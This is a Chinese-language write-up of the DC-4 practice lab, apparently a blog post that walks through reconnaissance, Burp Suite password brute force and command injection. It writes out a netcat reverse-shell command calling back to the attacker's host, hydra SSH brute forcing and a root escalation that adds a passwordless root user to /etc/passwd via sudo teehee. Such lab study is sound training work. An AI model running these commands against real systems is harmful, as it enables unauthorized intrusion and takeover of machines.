DC- 4 靶机复盘

信息搜集

1. IP扫描

nmap -sP -T4 10.4.7.0/24

得到 IP地址:
kali ip :10.4.7.128
靶机IP:10.4.7.130
DC- 4 靶机复盘_第1张图片

2. 端口扫描

nmap -A -p- 10.4.7.130 -sV

扫描出该靶机开放了 22 和 80 端口,分别开放了 ssh 和 http 服务。
DC- 4 靶机复盘_第2张图片

3. 目录扫描

dirb http://10.4.7.130/

DC- 4 靶机复盘_第3张图片
并没有发现什么有用的信息

4. 访问网页

DC- 4 靶机复盘_第4张图片
访问后发现一个登录框,其他什么都没有,可以尝试进行密码爆破

渗透步骤

1. 用户密码爆破

在登录框随便输入用户名和密码,点击登入,用burpsuite抓包
DC- 4 靶机复盘_第5张图片
将抓到的请求报文发送到 intruder

DC- 4 靶机复盘_第6张图片

DC- 4 靶机复盘_第7张图片

标记出密码,猜测用户名是 admin
DC- 4 靶机复盘_第8张图片
进行爆破攻击

DC- 4 靶机复盘_第9张图片
爆破成功
查看回显报文最长的包,得到密码
密码:happy
DC- 4 靶机复盘_第10张图片
然后进行登录
DC- 4 靶机复盘_第11张图片
来到命令执行的界面
DC- 4 靶机复盘_第12张图片

2. 任意命令执行

使用bp进行抓包,右键发到重发器
DC- 4 靶机复盘_第13张图片
DC- 4 靶机复盘_第14张图片

3. 反弹shell

通过尝试,不能echo命令写入木马,只好换一种方法进行反弹shell
可以尝试使用 nc 进行反弹
先在 kali 上使用nc 监听8888端口
nc - lnvp 8888
在这里插入图片描述
然后回到 bp上,让靶机执行以下命令,将 shell 弹到 kali 监听的 8888 端口上
nc -e /bin/bash 10.4.7.128 8888

还要先将其进行URL编码
DC- 4 靶机复盘_第15张图片
然后进行传参
DC- 4 靶机复盘_第16张图片
成功获得shell
进行升级为交互shell
python -c 'import pty;pty.spawn("/bin/bash")'

DC- 4 靶机复盘_第17张图片

4. 尝试提权

前面打DC靶场学到的提权方式在这都不管用了,所以就不演示了

看一下该主机的普通用户,能不能尝试登进去寻找其他突破口
DC- 4 靶机复盘_第18张图片
可以看到有三个普通用户,测试发现,只有jim用户才有权限查看
来到/home/jim/backups目录下
DC- 4 靶机复盘_第19张图片
打开该文件,有一堆密码在(根据文件名的提示,应该是之前用过的老密码)
DC- 4 靶机复盘_第20张图片
将这些密码复制,然后放着一个文件里,然后进行密码爆破
hydra -l jim -P 1.txt ssh://10.4.7.130 -V
DC- 4 靶机复盘_第21张图片
DC- 4 靶机复盘_第22张图片
得到账号密码:
jim:jibril04

然后ssh 远程登陆
DC- 4 靶机复盘_第23张图片
接着尝试打开刚才反弹shell打开不了的文件mbox
DC- 4 靶机复盘_第24张图片
说我有一封来自root用户的信,接着我们去邮箱找一下/var/spool/mail

DC- 4 靶机复盘_第25张图片
邮件中说:今天结束时我要去度假,所以老板让我给你我的密码,以防万一。
并给出了密码
charles:^xHhA&hvim0y
用该账号密码进行 ssh 进行登录
在这里插入图片描述
该用户还不是root用户,要进行提权
DC- 4 靶机复盘_第26张图片
发现了个root权限的命令teehee(小型文本编辑器),可以利用这个命令进行提权
echo "zs::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
利用管道符配合teehee命令,在passwd文件里写入一个不用密码的root权限用户zs

在这里插入图片描述

查找flag

find / -name flag.txt

在这里插入图片描述
成功获得flag

DC- 4 靶机复盘_第27张图片
完成!

总结

1. nc 反弹shell命令

nc -e /bin/bash [监听的IP,也是kali ip] [监听的端口]

2. teehee 提权

echo "zs::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

原理就是通过修改passwd文件,添加一个无密码root权限的用户

你可能感兴趣的:(靶机笔记,笔记,笔记)